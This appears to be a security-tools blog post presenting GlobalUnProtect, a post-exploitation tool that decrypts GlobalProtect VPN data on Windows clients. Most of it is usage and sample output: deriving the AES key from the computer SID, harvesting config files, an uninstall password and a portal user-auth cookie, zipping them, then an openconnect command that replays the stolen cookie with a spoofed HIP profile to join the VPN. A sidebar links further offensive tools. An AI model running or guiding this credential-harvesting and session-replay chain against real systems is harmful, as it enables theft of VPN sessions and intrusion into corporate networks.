Post Exploitation

GlobalUnProtect – Decrypting And Harvesting Sensitive Data From GlobalProtect Installations

PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.

Usage

Run as standalone or in-memory via execute-assembly or equivalent. Collects all contents to an in-memory zip and writes to specified location.

> GlobalUnProtect.exe
Usage: GlobalUnProtect.exe C:\Path\To\Output.zip
> GlobalUnProtect.exe %TEMP%\GPUnprotect.zip
[*] Deriving AES key from computer SID
        [*] Computer SID (Hex) : 010400000000000515000000EFC8897F22AF1E09042DC851
        [*] Derived AES Key: C41006BCDBEF6683B2E7387EA9487A77C41006BCDBEF6683B2E7387EA9487A77
[*] Starting search for GlobalProtect data files
        [*] Found: C:\Users\User\AppData\Local\Palo Alto Networks\GlobalProtect\PanPCD_2ab96390c7dbe3439de74d0c9b0b1767.dat
        [*] Found: C:\Users\User\AppData\Local\Palo Alto Networks\GlobalProtect\PanPortalCfg_2ab96390c7dbe3439de74d0c9b0b17676.dat
        [*] Found: C:\Users\User\AppData\Local\Palo Alto Networks\GlobalProtect\PanPUAC_2ab96390c7dbe3439de74d0c9b0b1767.dat
[*] PanPortalCfg_2ab96390c7dbe3439de74d0c9b0b1767.dat looks like a portal config file, parsing for convenience:
        [*] User Name: example\user
        [*] Portal: vpn.example.com
        [*] User Domain: example
        [*] Portal Name: 
        [*] Tenant Id: 100001
        [*] Uninstall password: uninstall-password
        [*] Portal Pre-logon Cookie: empty
        [*] Portal User-auth Cookie: NzFkZjM0NGJlNjQ0NGEyMzQyMDQ4MmY3ZWE1ZWY1Y2ZhN2FiNTEyNDg0OTJhNWI0NTlhNjkzZjNmMDE2MTYzNzAyMjAzNWE2MGY0Y2I0YmVlMWIyNzExNGYzMTQwYTA5YTY3MTFjNDQ2MmQ3MjQ4NTE5MDEzYzU1OWQ4MzgwYjU=
[*] Collecting HIP profile data files
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_AM_Report_V4.dat
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_BC_Report_V4.dat
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_DE_Report_V4.dat
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_DLP_Report_V4.dat
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_FW_Report_V4.dat
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_PM_Report_V4.dat
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HipPolicy.dat
        [*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\PanGpHip.log
[*] Writing output ZIP file to C:\Users\User\AppData\Local\Temp\GPUnprotect.zip

Connect via OpenConnect:

$ sudo openconnect --protocol=gp --user="example\\username" --usergroup=portal:portal-userauthcookie --os=win https://vpn.example.com --csd-wrapper ~/tools/custom-hips-profile.sh
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

Playwright-MCP : A Powerful Tool For Browser Automation

Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…

2 weeks ago

JBDev : A Tool For Jailbreak And TrollStore Development

JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…

2 weeks ago

Kereva LLM Code Scanner : A Revolutionary Tool For Python Applications Using LLMs

The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…

2 weeks ago

Nuclei-Templates-Labs : A Hands-On Security Testing Playground

Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…

2 weeks ago

SSH-Stealer : The Stealthy Threat Of Advanced Credential Theft

SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…

2 weeks ago

ollvm-unflattener : A Tool For Reversing Control Flow Flattening In OLLVM

Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…

2 weeks ago